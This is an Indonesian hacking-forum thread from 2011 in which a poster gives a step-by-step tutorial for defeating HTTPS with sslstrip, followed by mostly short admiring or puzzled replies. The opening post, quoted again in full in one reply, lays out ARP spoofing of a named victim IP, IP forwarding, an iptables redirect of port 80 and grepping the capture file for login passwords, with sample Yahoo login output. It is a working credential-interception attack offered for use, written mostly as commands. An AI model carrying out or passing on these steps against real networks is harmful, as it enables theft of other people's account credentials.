.:: Blackc0de Forum ::.
Would you like to react to this message? Create an account in a few clicks or log in to continue.

-=Explore The World From Our Binary=-
 
HomeIndeksLatest imagesPendaftaranLogin

 

 pwned https(Tutorial)

Go down 
+14
Destrozen
syntaxerror
relaxymousID
rudi
anom91
Tuan DC
HenZ_DJ
bumiayucyber
night D. fury
c0.b3_t3
cvbn45
CyberWild
zer03s
wh1t3_39ret
18 posters
PengirimMessage
wh1t3_39ret
NuuBiiTooL
NuuBiiTooL
wh1t3_39ret


Jumlah posting : 16
Points : 37
Reputation : 1
Join date : 25.03.11

pwned https(Tutorial) Empty
PostSubyek: pwned https(Tutorial)   pwned https(Tutorial) Icon_minitimeThu Mar 31, 2011 9:51 pm


kali ini saya coba menjelaskan tentang hacking https connection menggunakan sslstrip..

langsung ke TKP...berikut adalah beberapa informasi mengenai jaringan :

- ip attacker : 192.168.1.50
- ip victim : 192.168.1.200
- gateway : 192.168.1.5

sekilas mengenai sslstrip :
Code:

root@wh1t3_39ret:~# sslstrip --help

sslstrip 0.1 by Moxie Marlinspike
Usage: sslstrip <options>

Options:
-w <filename>, --write=<filename> Specify file to log to (optional).
-p , --post Log only SSL POSTs. (default)
-s , --ssl Log all SSL traffic to and from server.
-a , --all Log all SSL and HTTP traffic to and from server.
-l <port>, --listen=<port> Port to listen on (default 10000).
-f , --favicon Substitute a lock favicon on secure requests.
-k , --killsessions Kill sessions in progress.
-h Print this help message.

note :
-opsi -a digunakan untuk logging semua trafic ( http,https)
-opsi -s digunakan untuk logging traficc ssl saja
-opsi -l digunakan untuk listen port ( meredirect port 80 victim,defaultnya 10000 )
-opsi : -w : tempat file dump akan disimpan.

1.jalankan ssl strip :
Code:

root@wh1t3_39ret:~# sslstrip -a -w laharisi
2.lakukan arpspoof terhadap victim
Code:

root@wh1t3_39ret:~# root@wh1t3_39ret:~# arpspoof -i vmnet1 -t 192.168.1.200 192.168.1.5
akftifkan fungsi ip_forward :
Code:

root@wh1t3_39ret:~# echo 1 > /proc/sys/net/ipv4/ip_forward

3.redirect port victim ( 80 ) ke port sslstrip (10000)
Code:

root@wh1t3_39ret:~# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000

4.ketika victim melakukan browsing misalnya mail.yahoo.com,maka kita bisa melihat username dan password loginnya..caranya buka file dump ( laharisi ),

Code:

root@wh1t3_39ret:~# cat laharisi | grep -i "passwd="
url+="?";if(valid_js()){var passwd=form.passwd.value;var challen
function hash2(form){var passwd=form.passwd.value
2009-06-30 19:22:34,004 SECURE POST Data (login.yahoo.com): .tries=1&.src=ym&.md5=&.hash=&.js=&.last=&promo=&.intl=us&.bypass=&.partner=&.u=1esn43t54k0a5&.v=0&.challenge=EzdOJPTgncnTmCU_K.IjpAtfSawf&.yplus=&.emailCode=&pkg=&stepid=&.ev=&hasMsgr=0&.chkP=Y&.done=http%3A%2F%2Fmail.yahoo.com&.pd=ym_ver%3D0%26c%3D%26ivt%3D%26sg%3D&login=wh1t3_39ret&passwd=disambunyikan&.save=Sign+In

kita bisa melihat bahwa username = wh1t3_39ret dan password = disembunyikan


maaf kalo ada kesalahan..soalnya masih newbie...

terima kasih...
Kembali Ke Atas Go down
zer03s
Administrator
Administrator
zer03s


Jumlah posting : 2471
Points : 4119
Reputation : 113
Join date : 13.12.10
Age : 32
Lokasi : /home/root/blackc0de

pwned https(Tutorial) Empty
PostSubyek: Re: pwned https(Tutorial)   pwned https(Tutorial) Icon_minitimeSun Jul 03, 2011 4:21 am

mantaaapp gan pwned https(Tutorial) 772168924 ijin nyimaak :pening:
Kembali Ke Atas Go down
http://zer03s.blog.com/
zer03s
Administrator
Administrator
zer03s


Jumlah posting : 2471
Points : 4119
Reputation : 113
Join date : 13.12.10
Age : 32
Lokasi : /home/root/blackc0de

pwned https(Tutorial) Empty
PostSubyek: Re: pwned https(Tutorial)   pwned https(Tutorial) Icon_minitimeMon Aug 29, 2011 5:06 am

buat om taslim pasti lagi butuh ini pwned https(Tutorial) 1956393079
Kembali Ke Atas Go down
http://zer03s.blog.com/
CyberWild
Moderator
Moderator
CyberWild


Jumlah posting : 1665
Points : 2310
Reputation : 104
Join date : 11.06.11
Age : 43
Lokasi : internet cloud

pwned https(Tutorial) Empty
PostSubyek: Re: pwned https(Tutorial)   pwned https(Tutorial) Icon_minitimeMon Aug 29, 2011 5:07 am

wew https tembus bro?
keren! pwned https(Tutorial) 772168924
Kembali Ke Atas Go down
http://cyberwild.p.ht/
cvbn45
Moderator
Moderator
cvbn45


Jumlah posting : 275
Points : 327
Reputation : 18
Join date : 01.01.11
Age : 31
Lokasi : dihatimu ^o^

pwned https(Tutorial) Empty
PostSubyek: Re: pwned https(Tutorial)   pwned https(Tutorial) Icon_minitimeMon Aug 29, 2011 10:03 am

ijin nyimak sambil belajar ... :maaf

kurang ngerti yg kek beginian :lugu
Kembali Ke Atas Go down
https://facebook.com/cvbn45
c0.b3_t3
Administrator
Administrator
c0.b3_t3


Jumlah posting : 227
Points : 488
Reputation : 37
Join date : 19.12.10
Lokasi : UNDER WORLD

pwned https(Tutorial) Empty
PostSubyek: Re: pwned https(Tutorial)   pwned https(Tutorial) Icon_minitimeThu Sep 01, 2011 5:13 am

Mancaps... pwned https(Tutorial) 37346
Kembali Ke Atas Go down
night D. fury
larva
larva
night D. fury


Jumlah posting : 284
Points : 311
Reputation : 5
Join date : 05.07.11
Age : 34
Lokasi : Tanah nenek & kakek moyang

pwned https(Tutorial) Empty
PostSubyek: Re: pwned https(Tutorial)   pwned https(Tutorial) Icon_minitimeFri Sep 09, 2011 3:26 pm

terlalu manis OM

pwned https(Tutorial) 1513430891
Kembali Ke Atas Go down
bumiayucyber
Newbie - Hack
Newbie - Hack
bumiayucyber


Jumlah posting : 379
Points : 422
Reputation : 9
Join date : 08.09.11

pwned https(Tutorial) Empty
PostSubyek: Re: pwned https(Tutorial)   pwned https(Tutorial) Icon_minitimeSat Sep 10, 2011 9:35 am

sangat indah bro,untuk nikmati

ane ijin sedot dulu,budayakan share
Kembali Ke Atas Go down
HenZ_DJ
VIP Member
VIP Member
HenZ_DJ


Jumlah posting : 567
Points : 711
Reputation : 10
Join date : 07.05.11
Age : 41
Lokasi : pekanbaru

pwned https(Tutorial) Empty
PostSubyek: Re: pwned https(Tutorial)   pwned https(Tutorial) Icon_minitimeSat Sep 17, 2011 7:35 am

wh1t3_39ret wrote:

kali ini saya coba menjelaskan tentang hacking https connection menggunakan sslstrip..

langsung ke TKP...berikut adalah beberapa informasi mengenai jaringan :

- ip attacker : 192.168.1.50
- ip victim : 192.168.1.200
- gateway : 192.168.1.5

sekilas mengenai sslstrip :
Code:

root@wh1t3_39ret:~# sslstrip --help

sslstrip 0.1 by Moxie Marlinspike
Usage: sslstrip <options>

Options:
-w <filename>, --write=<filename> Specify file to log to (optional).
-p , --post Log only SSL POSTs. (default)
-s , --ssl Log all SSL traffic to and from server.
-a , --all Log all SSL and HTTP traffic to and from server.
-l <port>, --listen=<port> Port to listen on (default 10000).
-f , --favicon Substitute a lock favicon on secure requests.
-k , --killsessions Kill sessions in progress.
-h Print this help message.

note :
-opsi -a digunakan untuk logging semua trafic ( http,https)
-opsi -s digunakan untuk logging traficc ssl saja
-opsi -l digunakan untuk listen port ( meredirect port 80 victim,defaultnya 10000 )
-opsi : -w : tempat file dump akan disimpan.

1.jalankan ssl strip :
Code:

root@wh1t3_39ret:~# sslstrip -a -w laharisi
2.lakukan arpspoof terhadap victim
Code:

root@wh1t3_39ret:~# root@wh1t3_39ret:~# arpspoof -i vmnet1 -t 192.168.1.200 192.168.1.5
akftifkan fungsi ip_forward :
Code:

root@wh1t3_39ret:~# echo 1 > /proc/sys/net/ipv4/ip_forward

3.redirect port victim ( 80 ) ke port sslstrip (10000)
Code:

root@wh1t3_39ret:~# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000

4.ketika victim melakukan browsing misalnya mail.yahoo.com,maka kita bisa melihat username dan password loginnya..caranya buka file dump ( laharisi ),

Code:

root@wh1t3_39ret:~# cat laharisi | grep -i "passwd="
url+="?";if(valid_js()){var passwd=form.passwd.value;var challen
function hash2(form){var passwd=form.passwd.value
2009-06-30 19:22:34,004 SECURE POST Data (login.yahoo.com): .tries=1&.src=ym&.md5=&.hash=&.js=&.last=&promo=&.intl=us&.bypass=&.partner=&.u=1esn43t54k0a5&.v=0&.challenge=EzdOJPTgncnTmCU_K.IjpAtfSawf&.yplus=&.emailCode=&pkg=&stepid=&.ev=&hasMsgr=0&.chkP=Y&.done=http%3A%2F%2Fmail.yahoo.com&.pd=ym_ver%3D0%26c%3D%26ivt%3D%26sg%3D&login=wh1t3_39ret&passwd=disambunyikan&.save=Sign+In

kita bisa melihat bahwa username = wh1t3_39ret dan password = disembunyikan


maaf kalo ada kesalahan..soalnya masih newbie...

terima kasih...


hhhhhhhhhmmmmmmmmmmm :capedeh
:hammer

gk paham w gan,,,,minta pencerahannya dunk agan2 yg sewa ma nih,,,,,,,,, :maho
Kembali Ke Atas Go down
Tuan DC
BC Security
BC Security
Tuan DC


Jumlah posting : 623
Points : 704
Reputation : 41
Join date : 11.08.11
Lokasi : in the Hell

pwned https(Tutorial) Empty
PostSubyek: Re: pwned https(Tutorial)   pwned https(Tutorial) Icon_minitimeSat Sep 17, 2011 1:52 pm

ijin nyimak smbil blajar oms.. :belajar:
Kembali Ke Atas Go down
anom91
Corporal
Corporal
anom91


Jumlah posting : 170
Points : 186
Reputation : 2
Join date : 15.08.11
Age : 33
Lokasi : 127.0.0.1

pwned https(Tutorial) Empty
PostSubyek: Re: pwned https(Tutorial)   pwned https(Tutorial) Icon_minitimeMon Sep 26, 2011 11:11 am

:fxx:
Kembali Ke Atas Go down
rudi
Top Nubie
Top Nubie
rudi


Jumlah posting : 33
Points : 42
Reputation : 3
Join date : 21.09.11
Age : 36

pwned https(Tutorial) Empty
PostSubyek: Re: pwned https(Tutorial)   pwned https(Tutorial) Icon_minitimeTue Sep 27, 2011 10:52 am

pwned https(Tutorial) 3402572103 izin coba gan............
Kembali Ke Atas Go down
relaxymousID
VIP Member
VIP Member



Jumlah posting : 447
Points : 519
Reputation : 14
Join date : 09.09.11
Lokasi : 127.0.0.1

pwned https(Tutorial) Empty
PostSubyek: Re: pwned https(Tutorial)   pwned https(Tutorial) Icon_minitimeTue Sep 27, 2011 12:13 pm

:belajar: :deadth
Kembali Ke Atas Go down
http://relaxymo.us
syntaxerror
NuuBiiTooL
NuuBiiTooL



Jumlah posting : 7
Points : 7
Reputation : 0
Join date : 08.10.11

pwned https(Tutorial) Empty
PostSubyek: Re: pwned https(Tutorial)   pwned https(Tutorial) Icon_minitimeSat Oct 08, 2011 8:53 am

pencerahan donk ????? 💀
Kembali Ke Atas Go down
Destrozen
Corporal
Corporal
Destrozen


Jumlah posting : 156
Points : 166
Reputation : 3
Join date : 17.06.11
Lokasi : root

pwned https(Tutorial) Empty
PostSubyek: Re: pwned https(Tutorial)   pwned https(Tutorial) Icon_minitimeFri Jan 27, 2012 3:12 am

GX NGERTI OM,,,
Kembali Ke Atas Go down
ocim32
Pro Nubie
Pro Nubie
ocim32


Jumlah posting : 59
Points : 65
Reputation : 2
Join date : 28.01.12

pwned https(Tutorial) Empty
PostSubyek: Re: pwned https(Tutorial)   pwned https(Tutorial) Icon_minitimeSat Jan 28, 2012 9:57 pm

mantab wa....
Kembali Ke Atas Go down
BumiayuKita
Administrator
Administrator
BumiayuKita


Jumlah posting : 2456
Points : 3020
Reputation : 85
Join date : 06.02.11
Age : 34
Lokasi : bumiayu

pwned https(Tutorial) Empty
PostSubyek: Re: pwned https(Tutorial)   pwned https(Tutorial) Icon_minitimeSun Jan 29, 2012 8:00 am

gw kondek bro,tq pinter sekali repu dah buat nt
Kembali Ke Atas Go down
http://aljinet.blogspot.com
argalingga
NuuBiiTooL
NuuBiiTooL



Jumlah posting : 5
Points : 7
Reputation : 0
Join date : 08.11.11

pwned https(Tutorial) Empty
PostSubyek: Re: pwned https(Tutorial)   pwned https(Tutorial) Icon_minitimeSun Jan 29, 2012 9:02 am

minta pencerahannya dong om pwned https(Tutorial) 3529815765
newbii
Kembali Ke Atas Go down
pudyfamouz
NuuBiiTooL
NuuBiiTooL



Jumlah posting : 11
Points : 11
Reputation : 0
Join date : 28.01.12

pwned https(Tutorial) Empty
PostSubyek: Re: pwned https(Tutorial)   pwned https(Tutorial) Icon_minitimeSun Jan 29, 2012 1:14 pm

Dari comment-commentnya, kayanya berhasil ne cara..
tapi ane masih bingung pwned https(Tutorial) 3529815765 ini pake terminal OS apa.???
pencerahannya dong om...
Kembali Ke Atas Go down
Sponsored content





pwned https(Tutorial) Empty
PostSubyek: Re: pwned https(Tutorial)   pwned https(Tutorial) Icon_minitime

Kembali Ke Atas Go down
 
pwned https(Tutorial)
Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» Sniffing Jaringan dengan SSL (https,http)
» Mengamankan Akun Facebook Dengan Mengaktifkan HTTPS [HTTP + SSL/TLS + TCP]
» Perbedaan HTTP (Hyper Text Transfer Protocol) dan HTTPS (Hyper Text Transfer Protocol Secure), langsung saja:
» Tutorial Debian
» tutorial deface web

Permissions in this forum:Anda tidak dapat menjawab topik
.:: Blackc0de Forum ::. :: Information Technology :: Web attack-
Navigasi: